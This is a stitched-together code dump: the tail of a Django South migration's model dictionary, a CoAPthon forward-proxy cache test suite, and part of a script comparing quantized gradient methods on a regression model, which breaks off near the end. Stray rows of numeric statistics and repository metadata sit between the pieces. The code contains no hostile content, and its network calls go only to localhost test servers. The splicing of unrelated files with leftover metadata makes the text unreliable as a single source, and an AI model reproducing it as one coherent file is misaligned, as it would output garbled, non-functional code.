'contact_phone': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_solutioncontact_created_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message_box': ('django.db.models.fields.TextField', [], {}),
'state': ('django.db.models.fields.SmallIntegerField', [], {'default': '2'}),
'subject': ('django.db.models.fields.TextField', [], {}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'envelope_solutioncontact_updated_by_'", 'null': 'True', 'to': u"orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'user_name': ('django.db.models.fields.TextField', [], {})
},
u'filer.file': {
'Meta': {'object_name': 'File'},
'_file_size': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'file': ('django.db.models.fields.files.FileField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'folder': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'all_files'", 'null': 'True', 'to': u"orm['filer.Folder']"}),
'has_all_mandatory_data': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255', 'blank': 'True'}),
'original_filename': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'owned_files'", 'null': 'True', 'to': u"orm['auth.User']"}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'polymorphic_filer.file_set+'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
'sha1': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '40', 'blank': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'filer.folder': {
'Meta': {'ordering': "(u'name',)", 'unique_together': "((u'parent', u'name'),)", 'object_name': 'Folder'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'filer_owned_folders'", 'null': 'True', 'to': u"orm['auth.User']"}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'children'", 'null': 'True', 'to': u"orm['filer.Folder']"}),
u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'filer.image': {
'Meta': {'object_name': 'Image', '_ormbases': [u'filer.File']},
'_height': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'_width': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'default_alt_text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'default_caption': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
u'file_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['filer.File']", 'unique': 'True', 'primary_key': 'True'}),
'must_always_publish_author_credit': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'must_always_publish_copyright': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'subject_location': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '64', 'null': 'True', 'blank': 'True'})
},
u'relationships.relationship': {
'Meta': {'ordering': "('created',)", 'unique_together': "(('from_user', 'to_user', 'status', 'site'),)", 'object_name': 'Relationship'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_users'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'relationships'", 'to': u"orm['sites.Site']"}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['relationships.RelationshipStatus']"}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_users'", 'to': u"orm['auth.User']"}),
'weight': ('django.db.models.fields.FloatField', [], {'default': '1.0', 'null': 'True', 'blank': 'True'})
},
u'relationships.relationshipstatus': {
'Meta': {'ordering': "('name',)", 'object_name': 'RelationshipStatus'},
'from_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'symmetrical_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'to_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'verb': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['envelope']
| 97.594937
| 262
| 0.577994
| 4,860
| 46,260
| 5.354938
| 0.061317
| 0.096523
| 0.168377
| 0.240538
| 0.853602
| 0.816715
| 0.799116
| 0.749741
| 0.73414
| 0.648607
| 0
| 0.00668
| 0.171574
| 46,260
| 474
| 263
| 97.594937
| 0.672416
| 0.005815
| 0
| 0.38022
| 0
| 0
| 0.614279
| 0.339662
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004396
| false
| 0.002198
| 0.008791
| 0
| 0.01978
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
16a268361c9855a9a7d66a5fcb5550adb56755f9
| 16,911
|
py
|
Python
|
cache_test.py
|
Dalanke/CoAPthon
|
6587d950c7cd76197beaf7b6b8d227d81340a8d7
|
[
"MIT"
] | 237
|
2015-01-06T17:13:39.000Z
|
2022-02-15T10:26:18.000Z
|
cache_test.py
|
Dalanke/CoAPthon
|
6587d950c7cd76197beaf7b6b8d227d81340a8d7
|
[
"MIT"
] | 143
|
2015-02-04T11:34:08.000Z
|
2022-03-04T10:58:30.000Z
|
cache_test.py
|
Dalanke/CoAPthon
|
6587d950c7cd76197beaf7b6b8d227d81340a8d7
|
[
"MIT"
] | 159
|
2015-02-10T00:57:34.000Z
|
2022-02-19T11:31:08.000Z
|
from Queue import Queue
import random
import socket
import threading
import unittest
from coapclient import HelperClient
from coapforwardproxy import CoAPForwardProxy
from coapserver import CoAPServer
from coapthon import defines
from coapthon.messages.option import Option
from coapthon.messages.request import Request
from coapthon.messages.response import Response
from coapthon.serializer import Serializer
import time
__author__ = 'Emilio Vallati'
__version__ = "1.0"
class Tests(unittest.TestCase):
def setUp(self):
self.server_address = ("127.0.0.1", 5683)
self.current_mid = random.randint(1, 1000)
self.server_mid = random.randint(1000, 2000)
self.server = CoAPServer("127.0.0.1", 5684)
self.server_thread = threading.Thread(target=self.server.listen, args=(10,))
self.server_thread.start()
self.proxy = CoAPForwardProxy("127.0.0.1", 5683, cache=True)
self.proxy_thread = threading.Thread(target=self.proxy.listen, args=(10,))
self.proxy_thread.start()
self.queue = Queue()
def tearDown(self):
self.server.close()
self.server_thread.join(timeout=25)
self.server = None
self.proxy.close()
self.proxy_thread.join(timeout=25)
self.proxy = None
def _test_with_client_delayed(self, message_list): # pragma: no cover
client = HelperClient(self.server_address)
for message, expected in message_list:
if message is not None:
received_message = client.send_request(message)
time.sleep(5)
if expected is not None:
if expected.etag is not None:
self.assertEqual(received_message.etag, expected.etag)
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, self.server_address)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.payload is not None:
self.assertEqual(received_message.payload, expected.payload)
if expected.max_age is not None:
if expected.max_age != 60:
self.assertNotEqual(received_message.max_age, 60)
else:
self.assertEqual(received_message.max_age, expected.max_age)
if expected.options:
self.assertEqual(len(received_message.options), len(expected.options))
for o in expected.options:
assert isinstance(o, Option)
if o.name != defines.OptionRegistry.MAX_AGE.name and o.name != defines.OptionRegistry.ETAG.name:
option_value = getattr(expected, o.name.lower().replace("-", "_"))
option_value_rec = getattr(received_message, o.name.lower().replace("-", "_"))
self.assertEqual(option_value, option_value_rec)
client.stop()
def client_callback(self, response):
print "Callback"
self.queue.put(response)
def test_get_multiple(self):
print "TEST_GET_MULTIPLE"
path = "/basic"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/basic"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Basic Resource"
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE (MAX AGE MUST BE CHECKED)
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/basic"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Basic Resource"
expected.max_age = 61
exchange2 = (req2, expected)
self._test_with_client_delayed([exchange1, exchange2])
def test_get_post(self):
print "TEST_GET_POST"
path = "/basic"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.payload = None
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange2 = (req2, expected)
self.current_mid += 1
# PREPARING THIRD EXPECTED RESPONSE
req3 = Request()
req3.code = defines.Codes.POST.number
req3.uri_path = path
req3.type = defines.Types["CON"]
req3._mid = self.current_mid
req3.destination = self.server_address
req3.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req3.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.payload = None
exchange3 = (req3, expected)
self.current_mid += 1
# PREPARING FOURTH EXPECTED RESPONSE
req4 = Request()
req4.code = defines.Codes.GET.number
req4.uri_path = path
req4.type = defines.Types["CON"]
req4._mid = self.current_mid
req4.destination = self.server_address
req4.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange4 = (req4, expected)
self.current_mid += 1
self._test_with_client_delayed([exchange1, exchange2, exchange3, exchange4])
def test_get_put(self):
print "TEST_GET_PUT"
path = "/basic"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.payload = None
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange2 = (req2, expected)
self.current_mid += 1
# PREPARING THIRD EXPECTED RESPONSE
req3 = Request()
req3.code = defines.Codes.PUT.number
req3.uri_path = path
req3.type = defines.Types["CON"]
req3._mid = self.current_mid
req3.destination = self.server_address
req3.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req3.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CHANGED.number
expected.token = None
expected.payload = None
exchange3 = (req3, expected)
self.current_mid += 1
# PREPARING FOURTH EXPECTED RESPONSE
req4 = Request()
req4.code = defines.Codes.GET.number
req4.uri_path = path
req4.type = defines.Types["CON"]
req4._mid = self.current_mid
req4.destination = self.server_address
req4.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange4 = (req4, expected)
self.current_mid += 1
self._test_with_client_delayed([exchange1, exchange2, exchange3, exchange4])
def test_get_delete(self):
print "TEST_GET_DELETE"
path = "/basic"
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.NOT_FOUND.number
expected.token = None
expected.payload = None
exchange0 = (req2, expected)
self.current_mid += 1
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/storage/new"
req.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.payload = None
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
exchange2 = (req2, expected)
self.current_mid += 1
# PREPARING THIRD EXPECTED RESPONSE
req3 = Request()
req3.code = defines.Codes.DELETE.number
req3.uri_path = path
req3.type = defines.Types["CON"]
req3._mid = self.current_mid
req3.destination = self.server_address
req3.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.DELETED.number
expected.token = None
expected.payload = None
exchange3 = (req3, expected)
self.current_mid += 1
# PREPARING FOURTH EXPECTED RESPONSE
req4 = Request()
req4.code = defines.Codes.GET.number
req4.uri_path = path
req4.type = defines.Types["CON"]
req4._mid = self.current_mid
req4.destination = self.server_address
req4.proxy_uri = "coap://127.0.0.1:5684/storage/new"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.NOT_FOUND.number
expected.token = None
exchange4 = (req4, expected)
self.current_mid += 1
self._test_with_client_delayed([exchange0, exchange1, exchange2, exchange3, exchange4])
def test_get_etag(self):
print "TEST_GET_ETAG"
path = "/etag"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.proxy_uri = "coap://127.0.0.1:5684/etag"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = None
expected.etag = str(0)
exchange1 = (req, expected)
self.current_mid += 1
# PREPARING SECOND EXPECTED RESPONSE
req2 = Request()
req2.code = defines.Codes.GET.number
req2.uri_path = path
req2.type = defines.Types["CON"]
req2._mid = self.current_mid
req2.destination = self.server_address
req2.proxy_uri = "coap://127.0.0.1:5684/etag"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.etag = str(0)
expected.max_age = 1
exchange2 = (req2, expected)
self.current_mid += 1
# PREPARING THIRD EXPECTED RESPONSE
req3 = Request()
req3.code = defines.Codes.POST.number
req3.uri_path = path
req3.type = defines.Types["CON"]
req3._mid = self.current_mid
req3.destination = self.server_address
req3.proxy_uri = "coap://127.0.0.1:5684/etag"
req3.payload = "Hello"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CHANGED.number
expected.token = None
expected.payload = None
expected.etag = str(1)
expected.location_path = "etag"
exchange3 = (req3, expected)
self.current_mid += 1
# PREPARING FOURTH EXPECTED RESPONSE
req4 = Request()
req4.code = defines.Codes.GET.number
req4.uri_path = path
req4.type = defines.Types["CON"]
req4._mid = self.current_mid
req4.destination = self.server_address
req4.proxy_uri = "coap://127.0.0.1:5684/etag"
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.payload = "Hello"
expected.etag = str(1)
exchange4 = (req4, expected)
self.current_mid += 1
self._test_with_client_delayed([exchange1, exchange2, exchange3, exchange4])
if __name__ == '__main__':
unittest.main()
| 34.232794
| 121
| 0.591095
| 1,902
| 16,911
| 5.1204
| 0.077287
| 0.06438
| 0.081939
| 0.066331
| 0.789609
| 0.770613
| 0.767841
| 0.732724
| 0.7318
| 0.731389
| 0
| 0.036438
| 0.308675
| 16,911
| 493
| 122
| 34.302231
| 0.796596
| 0.029153
| 0
| 0.742931
| 0
| 0
| 0.060088
| 0.036895
| 0
| 0
| 0
| 0
| 0.030848
| 0
| null | null | 0
| 0.03599
| null | null | 0.015424
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16e6f0852485d7991ebce87b5ffa12b326c358bc
| 12,427
|
py
|
Python
|
SimpleMSE/tf/convergence_region.py
|
afshinabdi/DistributedTraining-QCS
|
46197b23dc8d8002adcfebbae8653aae6fb77754
|
[
"MIT"
] | null | null | null |
SimpleMSE/tf/convergence_region.py
|
afshinabdi/DistributedTraining-QCS
|
46197b23dc8d8002adcfebbae8653aae6fb77754
|
[
"MIT"
] | 1
|
2020-11-26T11:36:58.000Z
|
2020-11-27T18:42:57.000Z
|
SimpleMSE/tf/convergence_region.py
|
afshinabdi/DistributedTraining-QCS
|
46197b23dc8d8002adcfebbae8653aae6fb77754
|
[
"MIT"
] | null | null | null |
import os
import time
import numpy as np
import scipy.io as sio
import regression_model as rm
from hadamard import load_hadamard_matrix
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
# os.environ['CUDA_VISIBLE_DEVICES'] = '2'
output_folder = 'QuantizedCS/SimpleMSE/tf(64,50)'
np.set_printoptions(precision=3, linewidth=80)
batch_size = 32
repeat_num = 10
num_iterations = 500
num_lr = 25
learning_rates = np.linspace(0, 0.25, num_lr + 1)[1:]
# learning_rates = [0.02, 0.05, 0.06, 0.08, 0.1, 0.15]
# num_lr = len(learning_rates)
def evaluate_baseline(T, Wopt, file_name):
model = rm.RegressionModel()
model.create(T, Wopt, quantizer='')
loss = np.zeros((num_lr, repeat_num, num_iterations))
loss2 = np.zeros((num_lr, repeat_num, num_iterations))
for n, lr in enumerate(learning_rates):
start = time.time()
print('\nLearning rate = ', lr, flush=True)
for rp in range(repeat_num):
# create model
model.reset()
info_str = ' '
for cnt in range(num_iterations):
# no quantization of the gradients
g = model.compute_gradients(batch_size)
model.apply_gradients(g, learning_rate=lr)
cur_loss = model.loss(batch_size=1024)
loss[n, rp, cnt] += cur_loss
loss2[n, rp, cnt] += (cur_loss**2)
if cnt % 10 == 0:
print(' ' * len(info_str), end='\r', flush=True)
if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
print(' Diverged.', end='\r', flush=True)
break
info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
print(info_str, end='\r', flush=True)
print('')
elapsed = time.time() - start
print(' elapsed time = %.3f' % elapsed, flush=True)
sio.savemat(file_name, mdict={
'loss': loss,
'loss2': loss2,
'lr': learning_rates,
})
def evaluate_onebit(T, Wopt, file_name):
model = rm.RegressionModel()
model.create(T, Wopt, quantizer='one-bit')
loss = np.zeros((num_lr, repeat_num, num_iterations))
loss2 = np.zeros((num_lr, repeat_num, num_iterations))
for n, lr in enumerate(learning_rates):
start = time.time()
print('\nLearning rate = ', lr, flush=True)
for rp in range(repeat_num):
# create model
model.reset()
info_str = ' '
for cnt in range(num_iterations):
# apply one-bit quantization method to the gradients
gh = model.compute_quantized_gradients(batch_size)
model.apply_gradients([gh], learning_rate=lr)
cur_loss = model.loss(batch_size=1024)
loss[n, rp, cnt] += cur_loss
loss2[n, rp, cnt] += (cur_loss**2)
if cnt % 10 == 0:
print(' ' * len(info_str), end='\r', flush=True)
if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
print(' Diverged.', end='\r', flush=True)
break
info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
print(info_str, end='\r', flush=True)
print('')
elapsed = time.time() - start
print(' elapsed time = %.3f' % elapsed, flush=True)
sio.savemat(file_name, mdict={
'loss': loss,
'loss2': loss2,
'lr': learning_rates,
})
def evaluate_qsgd(T, Wopt, file_name, bucket_size):
# create model
model = rm.RegressionModel()
model.create(T, Wopt, quantizer='qsg', num_levels=1, bucket_size=bucket_size)
loss = np.zeros((num_lr, repeat_num, num_iterations))
loss2 = np.zeros((num_lr, repeat_num, num_iterations))
for n, lr in enumerate(learning_rates):
start = time.time()
print('\nLearning rate = ', lr, flush=True)
for rp in range(repeat_num):
model.reset()
info_str = ' '
for cnt in range(num_iterations):
# apply qsgd quantization method to the gradients
gh = model.compute_quantized_gradients(batch_size)
model.apply_gradients([gh], learning_rate=lr)
cur_loss = model.loss(batch_size=1024)
loss[n, rp, cnt] += cur_loss
loss2[n, rp, cnt] += (cur_loss**2)
if cnt % 10 == 0:
print(' ' * len(info_str), end='\r', flush=True)
if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
print('Diverged.', end='\r', flush=True)
break
info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
print(info_str, end='\r', flush=True)
print('')
elapsed = time.time() - start
print(' elapsed time = %.3f' % elapsed, flush=True)
sio.savemat(file_name, mdict={
'loss': loss,
'loss2': loss2,
'lr': learning_rates,
})
def evaluate_topksgd(T, Wopt, file_name, K):
model = rm.RegressionModel()
model.create(T, Wopt, quantizer='topk', K=K)
loss = np.zeros((num_lr, repeat_num, num_iterations))
loss2 = np.zeros((num_lr, repeat_num, num_iterations))
for n, lr in enumerate(learning_rates):
start = time.time()
print('\nLearning rate = ', lr, flush=True)
for rp in range(repeat_num):
# create model
model.reset()
info_str = ' '
for cnt in range(num_iterations):
# apply qsgd quantization method to the gradients
gh = model.compute_quantized_gradients(batch_size)
model.apply_gradients([gh], learning_rate=lr)
cur_loss = model.loss(batch_size=1024)
loss[n, rp, cnt] += cur_loss
loss2[n, rp, cnt] += (cur_loss**2)
if cnt % 10 == 0:
print(' ' * len(info_str), end='\r', flush=True)
if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
print('Diverged.', end='\r', flush=True)
break
info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
print(info_str, end='\r', flush=True)
print('')
elapsed = time.time() - start
print(' elapsed time = %.3f' % elapsed, flush=True)
sio.savemat(file_name, mdict={
'loss': loss,
'loss2': loss2,
'lr': learning_rates,
})
def evaluate_dtqsgd(T, Wopt, file_name, H):
model = rm.RegressionModel()
model.create(T, Wopt, quantizer='dtq', num_levels=1, H=H)
loss = np.zeros((num_lr, repeat_num, num_iterations))
loss2 = np.zeros((num_lr, repeat_num, num_iterations))
for n, lr in enumerate(learning_rates):
start = time.time()
print('\nLearning rate = ', lr, flush=True)
for rp in range(repeat_num):
model.reset()
info_str = ' '
for cnt in range(num_iterations):
# apply qsgd quantization method to the gradients
gh = model.compute_quantized_gradients(batch_size)
model.apply_gradients([gh], learning_rate=lr)
cur_loss = model.loss(batch_size=1024)
loss[n, rp, cnt] += cur_loss
loss2[n, rp, cnt] += (cur_loss**2)
if cnt % 10 == 0:
print(' ' * len(info_str), end='\r', flush=True)
if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
print('Diverged.', end='\r', flush=True)
break
info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
print(info_str, end='\r', flush=True)
print('')
elapsed = time.time() - start
print(' elapsed time = %.3f' % elapsed, flush=True)
sio.savemat(file_name, mdict={
'loss': loss,
'loss2': loss2,
'lr': learning_rates,
})
def evaluate_qcssgd(T, Wopt, file_name, H, feedback, beta):
model = rm.RegressionModel()
model.create(T, Wopt, quantizer='qcs', num_levels=1, H=H, feedback=feedback, beta=beta)
loss = np.zeros((num_lr, repeat_num, num_iterations))
loss2 = np.zeros((num_lr, repeat_num, num_iterations))
for n, lr in enumerate(learning_rates):
start = time.time()
print('\nLearning rate = ', lr, flush=True)
for rp in range(repeat_num):
model.reset()
info_str = ' '
for cnt in range(num_iterations):
# apply qsgd quantization method to the gradients
gh = model.compute_quantized_gradients(batch_size)
model.apply_gradients([gh], learning_rate=lr)
cur_loss = model.loss(batch_size=1024)
loss[n, rp, cnt] += cur_loss
loss2[n, rp, cnt] += (cur_loss**2)
if cnt % 10 == 0:
print(' ' * len(info_str), end='\r', flush=True)
if (not np.isfinite(cur_loss)) or (cur_loss > 1e10):
print('Diverged.', end='\r', flush=True)
break
info_str = ' exp: {0: 2d}, iteration: {1: 4d}, loss={2:.5f}'.format(rp, cnt, cur_loss)
print(info_str, end='\r', flush=True)
print('')
elapsed = time.time() - start
print(' elapsed time = %.3f' % elapsed, flush=True)
sio.savemat(file_name, mdict={
'loss': loss,
'loss2': loss2,
'lr': learning_rates,
})
def compare_algorithms():
M, N = 50, 64
bucket_size = 320
min_eig = 1
max_eig = 4
H = load_hadamard_matrix(n=bucket_size)
k = bucket_size * 3 // 4
Hk = H[:, -k:] * np.sqrt(bucket_size) / np.sqrt(k)
K = int(M * N * np.log2(3) / 32)
fname = os.path.join(output_folder, 'model.mat')
if os.path.exists(fname):
data = sio.loadmat(fname)
Wopt = data['Wo']
T = data['T']
R = data['R']
else:
T, R = rm.create_transformation(M, min_eig, max_eig)
Wopt = np.random.normal(0, 1, size=(M, N))
sio.savemat(fname, mdict={'Wo': Wopt, 'T': T, 'R': R})
# print('_' * 40)
# print('Evaluating baseline...')
# fname = os.path.join(output_folder, 'baseline.mat')
# evaluate_baseline(T, Wopt, file_name=fname)
# print('_' * 40)
# print('Evaluating QSGD...')
# fname = os.path.join(output_folder, 'qsgd.mat')
# evaluate_qsgd(T, Wopt, file_name=fname, bucket_size=bucket_size)
# print('_' * 40)
# print('Evaluating Top-k SGD...')
# fname = os.path.join(output_folder, 'topk{}-sgd.mat'.format(K))
# evaluate_topksgd(T, Wopt, file_name=fname, K=K)
print('_' * 40)
